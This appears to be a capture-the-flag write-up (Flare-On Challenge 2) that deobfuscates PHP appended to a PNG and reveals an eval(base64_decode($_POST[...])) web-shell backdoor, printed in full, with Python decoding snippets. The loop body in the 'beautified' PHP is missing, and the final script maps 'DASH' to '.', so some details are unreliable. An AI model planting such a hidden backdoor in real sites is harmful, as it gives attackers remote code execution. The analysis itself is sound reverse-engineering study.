
Challenge 2

The second challenge is structured as following:

├── home.html
└── img
    └── flare-on.png
  • The directory contained a home.html file and an img folder that had an flare-on.png image.

On inspecting the home.html code, it was found that that the flare-on.png image was being included using PHP. This raised the possibility that the flare-on.png file might not be a standard image but could also contain embedded PHP code.

HTML code

Upon checking the flare-on.png, it revealed an obfuscated PHP code appended at the end as shown below.

PHP appended

The beautified version of above PHP code is as follows.

<?php $terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");
$order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47);
for ($i=0;$i<count($order);$i++)
eval($do_me); ?>

To de-obfuscate the above PHP code, we can simply replace the eval() function with echo() function. After execution with this modification, the output is shown below.


Here, the output revealed second layer of obfuscated PHP code. This code executes $___ with $__ as parameter with eval.

The $___ variable contains a mix of octal and hexadecimal values. Lets quickly decode this using a Python script.

cipher_text= [0x62,0o141,0x73,0o145,0x36,0o64,0x5f,0o144,0x65,0o143,0x6f,0o144,0x65]
plain_text = ''
for text in cipher_text:
    plain_text += chr(text) 

The value was decoded as base64_decode.

So, the eval($___($__)) is eval(base64_decode($__)). Here, the value of $__ variable will be decoded from base64.

Now, decoding the value JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7 of variable $__ from base64, the value is code=base64_decode($_);eval($code); So, the above script will decode $_ variable from base64 and execute it.

Upon decoding $_ from base64, the following code was revealed:

if(isset($_POST["\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D"])) { eval(base64_decode($_POST["\97\49\x31\68\x4F\x54\116\104\x61\116\x44\79\x54\106\97\118\97\53\x63\114\x61\x70\65\84\102\x6C\x61\114\101\x44\65\x53\72\111\x6E\x44\x4F\84\99\x6F\x6D"])); }

The above code contains following mix of decimal and hexadecimal values that is executed with eval():


The same above python script was utilized to convert these values to their ASCII representation:

input= [97,49,49,68,0x4F,84,116,0x68,97,0x74,0x44,0x4F,0x54,0x6A,97,0x76,0x61,0x35,0x63,0x72,97,0x70,0x41,84,0x66,0x6C,97,0x72,0x65,0x44,65,0x53,72,111,110,68,79,84,99,0x6F,0x6D]
flag = ''
for item in input:
    flag += chr(item) 

Executing the script produced the following string:

Lets now replace the placeholders with DOT, AT, and DASH with ., @, and -, respectively.

input= [97,49,49,68,0x4F,84,116,0x68,97,0x74,0x44,0x4F,0x54,0x6A,97,0x76,0x61,0x35,0x63,0x72,97,0x70,0x41,84,0x66,0x6C,97,0x72,0x65,0x44,65,0x53,72,111,110,68,79,84,99,0x6F,0x6D]
flag = ''
for item in input:
    flag += chr(item) 
print(flag.replace("DOT", ".").replace("DASH",".").replace("AT", "@"))

Flag: [email protected]

This post is licensed under CC BY 4.0 by the author.

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